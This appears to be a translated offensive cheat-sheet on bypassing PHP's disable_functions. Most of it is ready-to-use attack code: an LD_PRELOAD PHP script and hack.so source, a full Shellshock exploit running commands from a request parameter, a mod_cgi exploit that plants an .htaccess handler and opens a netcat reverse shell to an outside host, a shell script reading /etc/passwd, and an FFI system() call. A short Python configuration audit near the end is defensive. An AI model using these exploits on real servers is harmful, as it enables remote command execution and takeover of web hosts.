Bypass disable_functions

Main reference: https://www.anquanke.com/post/id/208451

0x01 LD_PRELOAD

What LD_PRELOAD is: see "Beware of the LD_PRELOAD environment variable on UNIX" https://blog.csdn.net/haoel/article/details/1602108

How the bypass works: https://blog.csdn.net/weixin_33738982/article/details/87979967

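Attack approach:
1. With upload permission, upload the specific PHP script, hack.so, and so on
2. Upload a custom shared library, hack.so (look at the functions loaded by the program that a non-disabled function starts, e.g. readelf -s /usr/sbin/sendmail, then rewrite a function of the same name)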

PHP script for reference (attack based on the mail() function)


<?php
putenv("LD_PRELOAD=/var/www/hack.so");
mail("[email protected]","","","","");

Source of hack.so

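#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Command run once the preloaded library is active. */
void payload() {
        system("rm /tmp/check.txt");
}

/* Same name as libc's geteuid(), so the dynamic linker resolves calls to this copy. */
int geteuid() {
        if (getenv("LD_PRELOAD") == NULL) { return 0; }
        /* Clear the variable so the process started by system() does not preload the library again. */
        unsetenv("LD_PRELOAD");
        payload();
        return 0;
}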

0x02 ShellShock

Uses the bash Shellshock vulnerability (CVE-2014-6271), which is present in bash versions 1.14 – 4.3.
exp.php: upload it, then use it with ?cmd=xxx

<?php 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none 
# Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: http://php.net 
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271 

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
   $tmp = tempnam(".","data"); 
   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
   // In Safe Mode, the user may only alter environment variables whose names
   // begin with the prefixes supplied by this directive.
   // By default, users will only be able to set environment variables that
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
   // PHP will let the user modify ANY environment variable!
   //mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
   error_log('a',1);
   $output = @file_get_contents($tmp); 
   @unlink($tmp); 
   if($output != "") return $output; 
   else return "No output, or not vuln."; 
} 
echo shellshock($_REQUEST["cmd"]); 
?>

0x03 Apache Mod CGI

This can be used even when putenv is disabled.

Prerequisites:

The directory is writable
Apache uses apache_mod_php
The web directory has been granted AllowOverride
mod_cgi is enabled

Upload .htaccess

Options +ExecCGI
AddHandler cgi-script .test

Then upload shell.test

#!/bin/bash
echo&&cat /etc/passwd

Then request shell.test

Exploit script

<?php
$cmd = "nc -c '/bin/bash' xxx.xx.xx.xx 4444"; //command to be executed
$shellfile = "#!/bin/bash\n"; //using a shellscript
$shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ? $yes : $no) . "<br>\n";
}
if (!isset($_GET['checked']))
{
    @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
    header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
    $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
    $writable = is_writable('.'); //current dir writable?
    $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
        checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
        checkEnabled("Is writable",$writable,"Yes","No");
        checkEnabled("htaccess working",$htaccess,"Yes","No");
    if(!($modcgi && $writable && $htaccess))
    {
        echo "Error. All of the above must be true for the script to work!"; //abort if not
    }
    else
    {
        checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Succeeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
        checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
        checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
        checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
        echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; //call the script
    }
}
?>

0x04 PHP-FPM

https://www.anquanke.com/post/id/208451#h2-4

0x05 UAF

Json Serializer UAF

Triggered through a heap overflow in JSON serialization, which is then used to bypass disable_functions. Affected versions:
7.1 – all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

GC UAF

Triggered through a heap overflow in the PHP garbage collector; affected versions are 7.0-1.3

Backtrace UAF

Affected versions are 7.0-7.4

exp : https://www.anquanke.com/post/id/208451#h2-8

0x06 FFI extension

Conditions: php>7.4 with the FFI extension enabled (ffi.enable=true). We can then use FFI to call C's system and so execute commands.

exp:

<?php
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami >/tmp/1");
echo file_get_contents("/tmp/1");
@unlink("/tmp/1");
?>

Request the page to get the returned output.
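
Seen from the hardening side, sections 0x01 to 0x06 each depend on a setting that can be checked in configuration. The following is an added example, not part of the original post: a Python audit that reports which of those preconditions hold in given php.ini and Apache configuration text. The function names, finding labels and sample configuration are constructed for illustration.

```python
import re

# 0x01/0x02 rely on putenv() plus a function that spawns an external program
# inheriting the environment: mail(), or error_log() with message type 1.
SPAWNERS = {"mail", "error_log"}

def ini_value(php_ini, key):
    """Return the last uncommented `key = value` in php.ini text, or None."""
    value = None
    for line in php_ini.splitlines():
        line = line.split(";", 1)[0].strip()  # drop ; comments
        m = re.match(rf"{re.escape(key)}\s*=\s*(.*)$", line, re.I)
        if m:
            value = m.group(1).strip().strip('"')
    return value

def audit(php_ini, apache_conf):
    """Return findings for the preconditions named in sections 0x01-0x06."""
    findings = []
    raw = ini_value(php_ini, "disable_functions") or ""
    disabled = {f.strip().lower() for f in raw.split(",") if f.strip()}
    reachable = sorted(SPAWNERS - disabled)
    if "putenv" not in disabled and reachable:
        findings.append("env-route: putenv + " + ",".join(reachable))
    # PHP defaults ffi.enable to "preload"; "true" exposes FFI to web requests.
    if (ini_value(php_ini, "ffi.enable") or "preload").lower() in {"true", "1", "on", "yes"}:
        findings.append("ffi: ffi.enable=true")
    # 0x03: .htaccess needs Options (ExecCGI) and FileInfo (AddHandler) overrides.
    cgi = re.search(r"^\s*LoadModule\s+cgid?_module\b", apache_conf, re.I | re.M)
    for m in re.finditer(r"^\s*AllowOverride\s+(.+)$", apache_conf, re.I | re.M):
        opts = [o.lower() for o in m.group(1).split()]
        both = "fileinfo" in opts and any(o.startswith("options") for o in opts)
        if cgi and ("all" in opts or both):
            findings.append("mod_cgi: AllowOverride " + m.group(1).strip())
    return findings

# Constructed sample configuration (not taken from the page).
SAMPLE_INI = """
disable_functions = system,exec,shell_exec,passthru,popen,proc_open
ffi.enable = true
"""
SAMPLE_APACHE = """
LoadModule cgi_module modules/mod_cgi.so
<Directory /var/www/html>
    AllowOverride All
</Directory>
"""

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_INI, SAMPLE_APACHE)))
```

The check only sees the text it is given, so pass it the merged configuration; statically compiled Apache modules and included files are outside its view.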

0x07 ImageMagick

0x08 COM component

To be added
